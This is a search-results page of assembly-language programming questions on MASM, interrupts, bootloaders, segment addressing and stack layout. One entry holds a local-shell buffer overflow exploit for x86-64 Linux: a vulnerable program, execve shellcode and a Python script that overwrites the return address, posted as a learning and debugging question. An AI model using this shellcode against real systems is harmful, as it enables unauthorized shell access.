Search Results

Search found 6912 results on 277 pages for 'assembly resolution'.

Page 67/277 | < Previous Page | 63 64 65 66 67 68 69 70 71 72 73 74  | Next Page >

  • reading a BYTE as a DWORD in Masm

    - by Help I'm in college
    Hi, once again I'm doing MASM programming. I'm trying to write a procedure using the Irvine32 library where the user enters a string which is put into an array of BYTEs with ReadString. Then it loops over that arrray and determines if each character is a number. However, when I try cmp [buffer + ecx], 30h MASM complains about comparing two things that are not the same size. Is there anyway I could read the ASCII code in each BYTE in the array as a DWORD (or otherwise extract the ASCII value in each BYTE)?

    Read the article

  • Shellcode for a simple stack overflow doesn't start a shell

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. Seems like the execve syscall fails. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code) Vulnerable file buffer.s: .data .fmtsp: .string "Stackpointer %p\n" .fmtjump: .string "Jump to %p\n" .text .global main main: push %rbp mov %rsp, %rbp sub $120, %rsp # calling printf without setting rax # to zero results in a segfault. why? xor %rax, %rax mov %rsp, %rsi mov $.fmtsp, %rdi call printf mov %rsp, %rdi call gets xor %rax, %rax mov $.fmtjump, %rdi mov 8(%rbp), %rsi call printf xor %rax, %rax leave ret shellcode.s .text .global main main: mov $0x68732f6e69622fff, %rbx shr $0x8, %rbx push %rbx mov %rsp, %rdi xor %rsi, %rsi xor %rdx, %rdx xor %rax, %rax add $0x3b, %rax syscall exploit.py shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05" stackpointer = "\x7f\xff\xff\xff\xe3\x28" output = shellcode output += 'a' * (120 - len(shellcode)) # fill buffer output += 'b' * 8 # override stored base pointer output += ''.join(reversed(stackpointer)) print output Compiled with: $ gcc -o buffer buffer.s $ gcc -o shellcode shellcode.s Started with: $ python exploit.py | ./buffer Stackpointer 0x7fffffffe328 Jump to 0x7fffffffe328

    Read the article

  • Address of function is not actual code address

    - by mrjoltcola
    Debugging some code in Visual Studio 2008 (C++), I noticed that the address in my function pointer variable is not the actual address of the function itself. This is an extern "C" function. int main() { void (*printaddr)(const char *) = &print; // debug shows printaddr == 0x013C1429 } Address: 0x013C4F10 void print() { ... } The disassembly of taking the function address is: void (*printaddr)(const char *) = &print; 013C7465 C7 45 BC 29 14 3C 01 mov dword ptr [printaddr],offset print (13C1429h) What am I missing?

    Read the article

  • Questions a bout "interrupt"

    - by smwikipedia
    Could someone help me clarify the following conecpts, and the relationship among them? Maskable interrupt Unmaskable interrupt Hardware interrupt Software interrupt CPU INTR pin the IF bit of EFlags register Some specific questions: What's the relationship between Maskable/Unmaskable interrupt and Hardware/Software interrupt? What kind of interrupts does INTR pin detect? What kind of interrupts are enabled/disabled by IF bit of EFlags register? What kind of interrupts need the presence of an interrupt controller? Many thanks.

    Read the article

  • How is return address specified in stack?

    - by Mask
    This is what I see by disassemble for the statement function(1,2,3);: movl $0x3,0x8(%esp) movl $0x2,0x4(%esp) movl $0x1,(%esp) call 0x4012d0 <_Z8functioniii> It seems the ret address is not pushed into stack at all,then how does ret work?

    Read the article

  • Passing parameters on the stack

    - by oxinabox.ucc.asn.au
    When you pass parameters to a function on the cpu stack, You put the parameters on then JSR puts the return address on the stack. So that means in your function you must take the top item of the stack (the return address) before you can take the others off) eg is the following the correct way to go about it: ... |Let’s do some addition with a function, MOVE.L #4, -(SP) MOVE.L #5, -(SP) JSR add |the result of the addition (4+5) is in D0 (9) ... add: MOVE.L (SP)+, A1 |store the return address |in a register MOVE.L (SP)+, D0 |get 1st parameter, put in D0 MOVE.L (SP)+, D2 |get 2nd parameter, put in D2 ADD.L D2, D0 |add them, |storing the result in D0 MOVE.L A1, -(SP) |put the address back on the |Stack RTS |return

    Read the article

  • Best resource for serious Commodore 64 programming.

    - by postfuturist
    What is the best resource for serious Commodore 64 programming? Assume that serious programming on the Commodore 64 is not done in BASIC V2 that ships with the Commodore 64. I feel like most of the knowledge is tied up in old books and not available on the internet. All that I have found online are either very beginner style introductions to Commodore 64 programming (Hello world), or arcane demo-coder hacks to take advantage of strange parts of the hardware. I haven't found a well-explained list of opcodes, memory locations for system calls, and general mid-level examples and tips. Main portals I have found: lemon64 C-64 Scene Database c64web Actually hosted on a Commodore 64! Tools I have found: cc65 A C compiler that can target Commodore 64.

    Read the article

  • Segment register, IP register and memory addressing issue!

    - by Zia ur Rahman
    In the following text I asked two questions and I also described that what I know about these question so that you can understand my thinking. Your precious comments about the below text are required. Below is the Detail of 1ST Question As we know that if we have one mega byte memory then we need 20 bits to address this memory. Another thing is each memory cell has a physical address which is of 20 bits in 1Mb memory. IP register in IAPX88 is of 16 bits. Now my point of view is, we can not access the memory at all by the IP register because the memory need 20 bit address to be addressed but the IP register is of 16 bits. If we have a memory of 64k then IP register can access this memory because this memory needs 16 bits to be addressed. But incase of 1mb memory IP can’t.tell me am i right or not if not why? Suppose physical address of memory is 11000000000000000101 Now how can we access this memory location by 16 bits. Below is the detail of Next Question: My next question is , suppose IP register is pointing to memory location, and the segment register is also pointing to a memory location (start of the segment), the memory is of 1MB, how we can access a memory location by these two 16 bit registers tell me the sequence of steps how the 20 bits addressable memory location is accessed . If your answer is, we take the segment value and we shift it left by 4 bits and then add the IP value into it to get the 20 bits address, then this raises another question that is the address bus (the address bus should be 20 bits wide), the registers both the segment register and the IP register are of 16 bits each , now if address bus is 20 bits wide then this means that the address bus is connected to both these registers. If its not the case then another thing that comes into my mind is that both these registers generate a 20 bit address and there would be a register which can store 20 bits and this register would be connected to both these register and the address bus as well.

    Read the article

  • Delay On Assembler?

    - by Norm
    Hey, I want to know how i can do delay (Timer) on assembler 16 bit on PC. Thank You for helping, Norm. OS: Windows CODE: delay: inc bx cmp bx,WORD ptr[time] je delay2 jmp delay delay2: inc dx cmp dx,WORD ptr[time2] je delay3 jmp delay mov bx,0 delay3: inc cx cmp cx,WORD ptr[time3] je Finish_delay jmp delay its not work good i need less complicated code

    Read the article

  • "call" instruction that seemingly jumps into itself

    - by Checkers
    I have gcc 4 compiling some C++ code into the following (from objdump): 00000030 <func()>: 30: 55 push %ebp 31: 89 e5 mov %esp,%ebp 33: 56 push %esi 34: 31 f6 xor %esi,%esi 36: 53 push %ebx 37: bb 00 00 00 00 mov $0x0,%ebx 3c: 83 ec 40 sub $0x40,%esp 3f: c7 04 24 01 00 00 00 movl $0x1,(%esp) 46: e8 fc ff ff ff call 47 <func()+0x17> 4b: 8d 55 ec lea 0xffffffec(%ebp),%edx 4e: 89 14 24 mov %edx,(%esp) 51: 89 5c 24 04 mov %ebx,0x4(%esp) 55: 89 74 24 08 mov %esi,0x8(%esp) 59: 89 44 24 0c mov %eax,0xc(%esp) ; the rest of the function is omitted I can't understand the operand of call instruction here, why does it call into itself, but with one byte off?

    Read the article

  • Programatically detect number of physical processors/cores or if hyper-threading is active on Window

    - by HTASSCPP
    I have a multithreaded c++ application that runs on Windows, Mac and a few Linux flavours. To make a long story short: Inorder for it to run at maximum efficiency I have to be able to instantiate a single thread per physical processor/core. Creating more threads than there are physical processors/cores degrades the performance of my program considerably. I can already correctly detect the number of logical processors/cores correctly on all three of these platforms. To be able to detect the number of physical processors/cores correctly I'll have to detect if hyper-treading is supported AND active. My question therefore is if there is a way to detect whether hyperthreading is supported AND ENABLED? If so, how exactly.

    Read the article

  • Hello World bootloader not working!

    - by Newbie
    Hello. I've been working through the tutorials on this webpage which progressively creates a bootloader that displays Hello World. The 2nd tutorial (where we attempt to get an "A" to be output) works perfectly, and yet the 1st tutorial doesn't work for me at all! (The BIOS completely ignores the floppy disk and boots straight into Windows). This is less of an issue, although any explanations would be appreciated. The real problem is that I can't get the 3rd tutorial to work. Instead on outputting "Hello World", I get an unusual character (and blinking cursor) in the bottom-left corner of the screen. It looks a bit like a smiley face inside a rounded rectangle. Does anyone know how to get Hello World to display as it should?

    Read the article

  • What's the output object file format of GNU assembler as?

    - by smwikipedia
    I have checked the assembler options of GNU assembler as and I didn't find an option to specify the output object file format. If I am using the following command as -o foobar.o foobar.s What object file format will I get? The as manual says that "The GNU as can be configured to produce several alternative object file formats." But how? How can I change it to a ELF format? Many thanks.

    Read the article

  • function's return address is different from its supposed value, buffer overflow,

    - by ultrajohn
    Good day everyone! I’m trying to understand how buffer overflow works. I’m doing this for my project in a computer security course I’m taking. Right now, I’m in the process of determining the address of the function’s return address which I’m supposed to change to perform a buffer overflow attack. I’ve written a simple program based from an example I’ve read in the internet. What this program does is it creates an integer pointer that will be made to point to the address of the function return address in the stack. To do this, (granted I understand how a function/program variables get organized in the stack), I add 8 to the buffer variable’ address and set it as the value of ret. I’m not doing anything here that would change the address contained in the location of func’s return address. here's the program: Output of the program when gets excecuted: As you can see, I’m printing the address of the variables buffer and ret. I’ve added an additional statement printing the value of the ret variable (supposed location of func return address, so this should print the address of the next instruction which will get executed after func returns from execution). Here is the dump which shows the supposed address of the instruction to be executed after func returns. (Underlined in green) As you can see, that value is way different from the value printed contained in the variable ret. My question is, why are they different? (of course in the assumption that what I’ve done are all right). Else, what have I done wrong? Is my understanding of the program’s runtime stack wrong? Please, help me understand this. My project is due nextweek and I’ve barely touched it yet. I’m sorry if I’m being demanding, I badly need your help.

    Read the article

  • assembler - understanding of some lines

    - by user1571682
    with the help of some tutorials, i wrote a little piece of code, to display me a string, after booting from my floppy. my problem is now, that dont understand some lines, were i hope u can help me, or just tell me, if im right. code: mov ax, 07C0h add ax, 288 ; (512 + 4096) / 16 = 288 mov ss, ax mov sp, 4096 mov ax, 07C0h mov ds, ax line: start the program @ the adress 07C0h (could i change this?) Add space for 288 paragraphs to ax ? Space of 4096 bytes for my program (to store variables and stuff?) Go to the start adress ? thanks for your help.

    Read the article

  • Far jump in ntdll.dll's internal ZwCreateUserProcess

    - by user49164
    I'm trying to understand how the Windows API creates processes so I can create a program to determine where invalid exes fail. I have a program that calls kernel32.CreateProcessA. Following along in OllyDbg, this calls kernel32.CreateProcessInternalA, which calls kernel32.CreateProcessInternalW, which calls ntdll.ZwCreateUserProcess. This function goes: mov eax, 0xAA xor ecx, ecx lea edx, dword ptr [esp+4] call dword ptr fs:[0xC0] add esp, 4 retn 0x2C So I follow the call to fs:[0xC0], which contains a single instruction: jmp far 0x33:0x74BE271E But when I step this instruction, Olly just comes back to ntdll.ZwCreateUserProcess at the add esp, 4 right after the call (which is not at 0x74BE271E). I put a breakpoint at retn 0x2C, and I find that the new process was somehow created during the execution of add esp, 4. So I'm assuming there's some magic involved in the far jump. I tried to change the CS register to 0x33 and EIP to 0x74BE271E instead of actually executing the far jump, but that just gave me an access violation after a few instructions. What's going on here? I need to be able to delve deeper beyond the abstraction of this ZwCreateUserProcess to figure out how exactly Windows creates processes.

    Read the article

  • Order of the [BITS 16] and [ORG 0x0000] directives

    - by dboarman-FissureStudios
    I am beginning some experimentation in writing a kernel and having fun doing it. I have the basic boot-loader done and the following directives: [BITS 16] [ORG 0x0000] In the kernel tutorial, however, it starts with: [ORG 0x0000] [BITS 16] I was wondering if the order in which these directives are given makes a difference? I am using NASM version 2.06rc2, OpenSUSE 11.2

    Read the article

  • GCC emits extra code for boost::shared_ptr dereference

    - by Checkers
    I have the following code: #include <boost/shared_ptr.hpp> struct Foo { int a; }; static int A; void func_shared(const boost::shared_ptr<Foo> &foo) { A = foo->a; } void func_raw(Foo * const foo) { A = foo->a; } I thought the compiler would create identical code, but for shared_ptr version an extra seemingly redundant instruction is emitted. Disassembly of section .text: 00000000 <func_raw(Foo*)>: 0: 55 push ebp 1: 89 e5 mov ebp,esp 3: 8b 45 08 mov eax,DWORD PTR [ebp+8] 6: 5d pop ebp 7: 8b 00 mov eax,DWORD PTR [eax] 9: a3 00 00 00 00 mov ds:0x0,eax e: c3 ret f: 90 nop 00000010 <func_shared(boost::shared_ptr<Foo> const&)>: 10: 55 push ebp 11: 89 e5 mov ebp,esp 13: 8b 45 08 mov eax,DWORD PTR [ebp+8] 16: 5d pop ebp 17: 8b 00 mov eax,DWORD PTR [eax] 19: 8b 00 mov eax,DWORD PTR [eax] 1b: a3 00 00 00 00 mov ds:0x0,eax 20: c3 ret I'm just curious, is this necessary, or it is just an optimizer's shortcoming? Compiling with g++ 4.1.2, -O3 -NDEBUG.

    Read the article

  • Read a buffer of unknown size (Console input)

    - by Sanarothe
    Hi. I'm a little behind in my X86 Asm class, and the book is making me want to shoot myself in the face. The examples in the book are insufficient and, honestly, very frustrating because of their massive dependencies upon the author's link library, which I hate. I wanted to learn ASM, not how to call his freaking library, which calls more of his library. Anyway, I'm stuck on a lab that requires console input and output. So far, I've got this for my input: input PROC INVOKE ReadConsole, inputHandle, ADDR buffer, Buf - 2, ADDR bytesRead, 0 mov eax,OFFSET buffer Ret input EndP I need to use the input and output procedures multiple times, so I'm trying to make it abstract. I'm just not sure how to use the data that is set to eax here. My initial idea was to take that string array and manually crawl through it by adding 8 to the offset for each possible digit (Input is integer, and there's a little bit of processing) but this doesn't work out because I don't know how big the input actually is. So, how would you swap the string array into an integer that could be used? Full code: (Haven't done the integer logic or the instruction string output because I'm stuck here.) include c:/irvine/irvine32.inc .data inputHandle HANDLE ? outputHandle HANDLE ? buffer BYTE BufSize DUP(?),0,0 bytesRead DWORD ? str1 BYTE "Enter an integer:",0Dh, 0Ah str2 BYTE "Enter another integer:",0Dh, 0Ah str3 BYTE "The higher of the two integers is: " int1 WORD ? int2 WORD ? int3 WORD ? Buf = 80 .code main PROC call handle push str1 call output call input push str2 call output call input push str3 call output call input main EndP larger PROC Ret larger EndP output PROC INVOKE WriteConsole Ret output EndP handle PROC USES eax INVOKE GetStdHandle, STD_INPUT_HANDLE mov inputHandle,eax INVOKE GetStdHandle, STD_INPUT_HANDLE mov outputHandle,eax Ret handle EndP input PROC INVOKE ReadConsole, inputHandle, ADDR buffer, Buf - 2, ADDR bytesRead, 0 mov eax,OFFSET buffer Ret input EndP END main

    Read the article

< Previous Page | 63 64 65 66 67 68 69 70 71 72 73 74  | Next Page >